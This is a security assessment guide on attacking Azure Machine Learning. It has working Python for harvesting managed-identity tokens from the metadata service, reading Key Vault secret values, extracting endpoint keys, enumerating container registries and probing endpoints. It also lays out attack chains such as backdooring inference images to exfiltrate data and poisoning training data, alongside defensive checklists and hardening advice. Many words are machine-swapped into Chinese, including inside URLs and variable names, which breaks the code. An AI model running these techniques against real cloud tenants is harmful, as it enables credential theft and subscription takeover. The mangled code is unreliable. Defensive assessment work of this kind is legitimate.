Azure ML 攻擊 Surface
安全 assessment of Azure Machine Learning -- managed identity exploitation, workspace security, compute instance attacks, and endpoint vulnerabilities.
Azure ML Architecture
Azure Machine Learning organizes resources around workspaces. Each workspace connects to Azure storage, Key Vault, Container Registry, and Application Insights.
攻擊 Surface Map
| Component | Identity | Storage | Network Exposure |
|---|---|---|---|
| Compute Instances | Managed Identity/User | Workspace storage | VNet optional |
| Online Endpoints | Managed Identity | Model in ACR/Blob | Internet-facing |
| Batch Endpoints | Managed Identity | Blob 輸入/輸出 | VNet optional |
| Datastores | Workspace MI | Blob/ADLS/SQL | Workspace VNet |
| Pipelines | Pipeline MI | Blob artifacts | Workspace VNet |
攻擊 Techniques
1. Managed Identity 利用
Azure ML compute instances are assigned managed identities (system-assigned or user-assigned) that authenticate to Azure services without storing credentials. When these identities are overprivileged -- a common misconfiguration since ML workflows touch many services -- compromising a compute instance grants broad access across the Azure subscription.
The Instance Metadata Service (IMDS) at 169.254.169.254 is the primary 符元 source. Unlike AWS IMDSv2, Azure IMDS does not require a PUT-based 符元 exchange, making credential harvesting straightforward from any code running on the instance.
import requests
# From inside an Azure ML compute instance
# Get 符元 for the managed identity
token_url = "http://169.254.169.254/metadata/identity/oauth2/符元"
params = {
"api-version": "2018-02-01",
"resource": "https://management.azure.com/"
}
headers = {"Metadata": "true"}
resp = requests.get(token_url, params=params, headers=headers)
符元 = resp.json()["access_token"]
# Use the 符元 to enumerate Azure resources
mgmt_url = "https://management.azure.com/subscriptions?api-version=2020-01-01"
subs = requests.get(mgmt_url, headers={"Authorization": f"Bearer {符元}"}).json()
for sub in subs.get("value", []):
print(f"Subscription: {sub['displayName']} ({sub['subscriptionId']})")Lateral Movement via Managed Identity
Once you have a 符元, enumerate what the managed identity can reach. Common overprivilege patterns include Contributor-level access to the resource group (granting access to all sibling resources), Storage Blob Data Contributor on storage accounts containing non-ML data, and Key Vault Secrets Officer across multiple vaults.
import requests
def enumerate_role_assignments(符元, subscription_id):
"""Enumerate all role assignments for the current identity."""
url = (
f"https://management.azure.com/subscriptions/{subscription_id}"
f"/providers/Microsoft.Authorization/roleAssignments"
f"?api-version=2022-04-01"
)
headers = {"Authorization": f"Bearer {符元}"}
resp = requests.get(url, headers=headers).json()
for assignment in resp.get("value", []):
props = assignment["properties"]
print(f"Role: {props['roleDefinitionId'].split('/')[-1]}")
print(f" Scope: {props['scope']}")
print(f" Principal: {props['principalId']}")
print()
def get_token_for_resource(resource_url):
"""Get a managed identity 符元 scoped to a specific resource."""
resp = requests.get(
"http://169.254.169.254/metadata/identity/oauth2/符元",
params={"api-version": "2018-02-01", "resource": resource_url},
headers={"Metadata": "true"}
)
return resp.json()["access_token"]
# Get 符元 for different Azure services
mgmt_token = get_token_for_resource("https://management.azure.com/")
storage_token = get_token_for_resource("https://storage.azure.com/")
vault_token = get_token_for_resource("https://vault.azure.net")
graph_token = get_token_for_resource("https://graph.microsoft.com/")2. Workspace Data Store Enumeration
Azure ML workspaces connect to multiple data stores -- Azure Blob Storage, Azure Data Lake Storage (ADLS Gen2), Azure SQL 資料庫, and Azure 資料庫 for PostgreSQL. Each datastore registration stores connection details and credentials that can be extracted.
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
ml_client = MLClient(
DefaultAzureCredential(),
subscription_id="...",
resource_group_name="...",
workspace_name="..."
)
# List all datastores
for ds in ml_client.datastores.list():
print(f"Datastore: {ds.name} (type: {ds.type})")
if hasattr(ds, 'account_name'):
print(f" Storage: {ds.account_name}/{ds.container_name}")
# List registered models
for model in ml_client.models.list():
print(f"Model: {model.name} v{model.version}")Deep Datastore Inspection
Beyond listing datastores, extract their connection credentials and probe what data is accessible. Datastores that use account keys (rather than managed identity passthrough) store those keys in the workspace's Key Vault.
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
ml_client = MLClient(
DefaultAzureCredential(),
subscription_id="...",
resource_group_name="...",
workspace_name="..."
)
# Get detailed datastore info including credential type
for ds in ml_client.datastores.list():
detail = ml_client.datastores.get(ds.name)
print(f"\nDatastore: {detail.name}")
print(f" Type: {detail.type}")
# Check credential type -- account_key vs identity-based
if hasattr(detail, 'credentials'):
cred_type = type(detail.credentials).__name__
print(f" Credential type: {cred_type}")
# For blob datastores, try to list contents
if detail.type == "azure_blob":
from azure.storage.blob import BlobServiceClient
blob_client = BlobServiceClient(
f"https://{detail.account_name}.blob.core.windows.net",
credential=DefaultAzureCredential()
)
container = blob_client.get_container_client(detail.container_name)
print(f" Sample contents:")
for blob in container.list_blobs(results_per_page=5):
print(f" {blob.name} ({blob.size} bytes)")
# Enumerate environments (container images used for 訓練/推論)
for env in ml_client.environments.list():
print(f"Environment: {env.name} v{env.version}")
if hasattr(env, 'image'):
print(f" Image: {env.image}")
# List compute targets -- potential pivot points
for compute in ml_client.compute.list():
print(f"Compute: {compute.name} (type: {compute.type}, state: {compute.state})")3. Endpoint Authentication 測試
Azure ML online endpoints support two 認證 modes: key-based (a static API key) and Azure AD 符元-based. Misconfigurations include endpoints deployed with 認證 disabled, keys that are never rotated, or overly broad CORS policies.
import requests
# 測試 if endpoint requires 認證
endpoint_url = "https://my-endpoint.westus2.推論.ml.azure.com/score"
# Attempt unauthenticated access
resp = requests.post(endpoint_url, json={"data": [[1,2,3]]})
print(f"No auth: {resp.status_code}")
# Attempt with a stolen/guessed key
resp = requests.post(
endpoint_url,
json={"data": [[1,2,3]]},
headers={"Authorization": "Bearer <key>"}
)
print(f"With key: {resp.status_code}")Advanced Endpoint Probing
import requests
import json
def probe_endpoint(endpoint_url, keys=None):
"""Comprehensive endpoint 安全 評估."""
results = {}
# 測試 認證 modes
results["no_auth"] = requests.post(
endpoint_url, json={"data": [[1,2,3]]}
).status_code
# 測試 with OPTIONS to check CORS
results["cors"] = requests.options(endpoint_url).headers.get(
"Access-Control-Allow-Origin", "not set"
)
# 測試 Swagger/OpenAPI endpoint (often exposed)
swagger_url = endpoint_url.replace("/score", "/swagger.json")
swagger_resp = requests.get(swagger_url)
results["swagger_exposed"] = swagger_resp.status_code == 200
if results["swagger_exposed"]:
results["swagger_paths"] = list(swagger_resp.json().get("paths", {}).keys())
# 測試 health endpoint
health_url = endpoint_url.replace("/score", "/")
results["health"] = requests.get(health_url).status_code
# 測試 for verbose error messages (information disclosure)
malformed_resp = requests.post(
endpoint_url,
data="not json",
headers={"Content-Type": "application/json",
"Authorization": f"Bearer {keys[0]}" if keys else ""}
)
results["error_verbosity"] = len(malformed_resp.text)
results["error_sample"] = malformed_resp.text[:500]
return results
# Enumerate all endpoints and probe each
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
ml_client = MLClient(
DefaultAzureCredential(),
subscription_id="...",
resource_group_name="...",
workspace_name="..."
)
for endpoint in ml_client.online_endpoints.list():
print(f"\n=== Endpoint: {endpoint.name} ===")
print(f" Auth mode: {endpoint.auth_mode}")
print(f" Scoring URI: {endpoint.scoring_uri}")
# Get endpoint keys if key-based auth
if endpoint.auth_mode == "key":
keys = ml_client.online_endpoints.get_keys(endpoint.name)
print(f" Primary key: {keys.primary_key[:10]}...")
print(f" Secondary key: {keys.secondary_key[:10]}...")4. Key Vault Secret Extraction
Every Azure ML workspace creates an associated Azure Key Vault. This vault stores datastore credentials, API keys, custom secrets set by data scientists, and connection strings. The workspace's managed identity typically has broad access to this vault, making it a high-value target after initial compute compromise.
from azure.keyvault.secrets import SecretClient
from azure.identity import DefaultAzureCredential
# Azure ML workspaces have an associated Key Vault
kv_client = SecretClient(
vault_url="https://my-workspace-kv.vault.azure.net/",
credential=DefaultAzureCredential()
)
# List and read secrets
for secret in kv_client.list_properties_of_secrets():
print(f"Secret: {secret.name}")
value = kv_client.get_secret(secret.name)
print(f" Value: {value.value[:50]}...")Comprehensive Key Vault Enumeration
from azure.keyvault.secrets import SecretClient
from azure.keyvault.keys import KeyClient
from azure.keyvault.certificates import CertificateClient
from azure.identity import DefaultAzureCredential
credential = DefaultAzureCredential()
vault_url = "https://my-workspace-kv.vault.azure.net/"
# Enumerate secrets
secret_client = SecretClient(vault_url=vault_url, credential=credential)
print("=== Secrets ===")
for secret in secret_client.list_properties_of_secrets():
print(f" {secret.name} (enabled: {secret.enabled}, "
f"created: {secret.created_on})")
# Categorize by naming convention
if any(kw in secret.name.lower() for kw in
['connection', 'storage', 'sql', 'password', 'key', '符元']):
print(f" [HIGH VALUE] Likely credential or connection string")
# Enumerate keys (used for encryption, signing)
key_client = KeyClient(vault_url=vault_url, credential=credential)
print("\n=== Keys ===")
for key in key_client.list_properties_of_keys():
print(f" {key.name} (type: {key.key_type}, ops: {key.allowed_operations})")
# Enumerate certificates
cert_client = CertificateClient(vault_url=vault_url, credential=credential)
print("\n=== Certificates ===")
for cert in cert_client.list_properties_of_certificates():
print(f" {cert.name} (expires: {cert.expires_on})")5. Container Registry 利用
Azure ML workspaces use Azure Container Registry (ACR) to store Docker images for 訓練 and 推論 environments. Compromising ACR access enables model 供應鏈 attacks -- replacing legitimate 推論 images with backdoored versions.
import requests
def enumerate_acr(acr_name, 符元):
"""Enumerate repositories and images in Azure Container Registry."""
acr_url = f"https://{acr_name}.azurecr.io"
headers = {"Authorization": f"Bearer {符元}"}
# Get ACR-specific 符元 using managed identity
exchange_url = f"{acr_url}/oauth2/exchange"
acr_token_resp = requests.post(exchange_url, data={
"grant_type": "access_token",
"service": f"{acr_name}.azurecr.io",
"access_token": 符元
})
acr_token = acr_token_resp.json().get("refresh_token")
# List repositories
repos = requests.get(
f"{acr_url}/v2/_catalog",
headers={"Authorization": f"Bearer {acr_token}"}
).json()
for repo in repos.get("repositories", []):
print(f"Repository: {repo}")
# List tags
tags = requests.get(
f"{acr_url}/v2/{repo}/tags/list",
headers={"Authorization": f"Bearer {acr_token}"}
).json()
for tag in tags.get("tags", [])[:5]:
print(f" Tag: {tag}")
# Get manifest for image analysis
manifest = requests.get(
f"{acr_url}/v2/{repo}/manifests/{tag}",
headers={
"Authorization": f"Bearer {acr_token}",
"Accept": "application/vnd.docker.distribution.manifest.v2+json"
}
).json()
print(f" Layers: {len(manifest.get('layers', []))}")6. Network Isolation 評估
Azure ML supports VNet integration, but many deployments use the default configuration without network isolation. Even when VNet integration is enabled, misconfigured network 安全 groups (NSGs) and missing private endpoints create attack paths.
import requests
def assess_network_isolation(符元, subscription_id, resource_group, workspace_name):
"""評估 whether an Azure ML workspace has proper network isolation."""
base_url = "https://management.azure.com"
headers = {"Authorization": f"Bearer {符元}"}
# Get workspace details
ws_url = (
f"{base_url}/subscriptions/{subscription_id}"
f"/resourceGroups/{resource_group}"
f"/providers/Microsoft.MachineLearningServices"
f"/workspaces/{workspace_name}"
f"?api-version=2023-10-01"
)
ws = requests.get(ws_url, headers=headers).json()
props = ws.get("properties", {})
results = {
"public_network_access": props.get("publicNetworkAccess", "Unknown"),
"private_endpoints": [],
"managed_network": props.get("managedNetwork", {}),
}
# Check for private endpoint connections
pe_connections = props.get("privateEndpointConnections", [])
for pe in pe_connections:
pe_props = pe.get("properties", {})
results["private_endpoints"].append({
"name": pe.get("name"),
"status": pe_props.get("privateLinkServiceConnectionState", {}).get("status")
})
# 評估 risk
if results["public_network_access"] == "Enabled":
print("[CRITICAL] Public network access is enabled")
if not results["private_endpoints"]:
print("[HIGH] No private endpoints configured")
return resultsDefensive 評估 Checklist
When assessing Azure ML 安全 posture, verify these controls:
| Control Area | What to Check | MITRE ATLAS Reference |
|---|---|---|
| Identity | Managed identity scope, conditional access policies, RBAC assignments | AML.T0003 (ML Model Access) |
| Network | VNet integration, private endpoints, NSG rules, public endpoint exposure | AML.T0002 (Active Scanning) |
| Data | Storage encryption, datastore credential type, blob public access | AML.T0008 (Collection) |
| Compute | Instance isolation, SSH access, idle shutdown, patching | AML.T0004 (Full Model Access) |
| Registry | ACR access controls, image signing, 漏洞 scanning | AML.T0018 (後門 ML Model) |
| Secrets | Key Vault access policies, secret rotation, soft-delete enabled | AML.TA0008 (Collection) |
| 監控 | Diagnostic settings, Azure Sentinel integration, audit logs | AML.TA0006 (防禦 Evasion) |
Recommended Hardening
- Use user-assigned managed identities with least-privilege RBAC instead of system-assigned identities with broad scope.
- Enable VNet integration with private endpoints for the workspace, storage accounts, Key Vault, and ACR.
- Set
publicNetworkAccessto Disabled on all workspace resources. - Use credential passthrough for datastores instead of storing account keys in Key Vault.
- Enable ACR content trust and scan images for 漏洞 before deployment.
- Enforce
auth_mode: aad_tokenon endpoints rather than key-based 認證. - Enable Azure Sentinel with the ML workspace diagnostic settings for 安全 監控.
- Rotate endpoint keys on a regular schedule and after any suspected compromise.
Common 攻擊 Chains
Real-world Azure ML engagements typically combine multiple techniques. Here are common attack chains ordered by impact:
Chain 1: Compute to Subscription Takeover
1. Initial access via malicious notebook or compromised data scientist credentials
2. Extract managed identity 符元 from IMDS (169.254.169.254)
3. Enumerate role assignments to discover overprivileged identity
4. Access Key Vault secrets (storage keys, API credentials, connection strings)
5. Use storage keys to access blob containers across the subscription
6. Discover secrets in non-ML Key Vaults shared by the managed identity
7. Pivot to databases, APIs, or other services using extracted credentialsChain 2: Model Supply Chain 攻擊
1. Enumerate ACR repositories via workspace managed identity
2. 識別 推論 container images used by production endpoints
3. Pull the target image, inject a 後門 (data exfiltration layer)
4. Push the modified image with the same tag (no immutability)
5. Trigger endpoint redeployment (or wait for next scheduled update)
6. Backdoored model now exfiltrates 推論 data to 攻擊者 C2Chain 3: Training Pipeline Manipulation
1. Access workspace via compromised compute instance
2. Enumerate datastores and 識別 訓練資料 locations
3. Modify 訓練資料 in blob storage to inject 後門 examples
4. Wait for scheduled retraining pipeline to execute
5. Backdoored model is registered in model registry
6. Backdoored model is deployed to production endpointMITRE ATLAS Mapping for Azure ML 攻擊
| 攻擊 Technique | ATLAS ID | Azure ML-Specific Context |
|---|---|---|
| IMDS managed identity 符元 extraction | AML.TA0002 (Initial Access) | Workspace MI with broad RBAC scope |
| Datastore enumeration | AML.T0000 (Search for Victim's Data) | Registered datastores reveal all connected storage |
| Endpoint probing | AML.T0002 (Active Scanning) | Endpoints may use key-based auth without rotation |
| Model extraction via endpoint | AML.T0024 (Model Extraction) | Online endpoints serving model predictions |
| ACR image tampering | AML.T0018 (後門 ML Model) | Replace 訓練/推論 images in ACR |
| Key Vault lateral movement | AML.TA0008 (Collection) | Workspace Key Vault stores cross-service secrets |
| Training 資料投毒 via blob | AML.T0020 (Data Poisoning) | Modify 訓練資料 in connected blob storage |
Cross-Platform Comparison
| 攻擊 Vector | Azure ML | AWS SageMaker | GCP Vertex AI |
|---|---|---|---|
| Credential source | IMDS (managed identity) | IMDS (IAM role) | Metadata server (SA 符元) |
| Primary storage | Blob Storage / ADLS | S3 | GCS |
| Container registry | Azure Container Registry | Amazon ECR | Artifact Registry |
| Secret management | Key Vault (auto-created) | Secrets Manager / SSM | Secret Manager |
| Network isolation | VNet + Private Endpoints | VPC + VPC Endpoints | VPC-SC + Private Google Access |
| Biggest risk | Key Vault cross-service exposure | IAM role overprivilege | Service account Editor role |
相關主題
- 雲端 AI Infrastructure -- Cross-platform overview
- GCP Vertex AI -- GCP comparison
- AWS SageMaker -- AWS comparison
參考文獻
- Azure Machine Learning 安全 Baseline - Microsoft (2024) - Official 安全 configuration guidance
- "Securing Azure Machine Learning Workspaces" - Microsoft Learn (2024) - Workspace isolation and access control
- "Managed Identity 最佳實務" - Microsoft (2024) - Guidance on limiting managed identity scope
- "Azure 安全 Benchmark v3" - Microsoft (2023) - Cross-service 安全 controls applicable to Azure ML
What makes Azure ML's Key Vault integration a significant 攻擊面?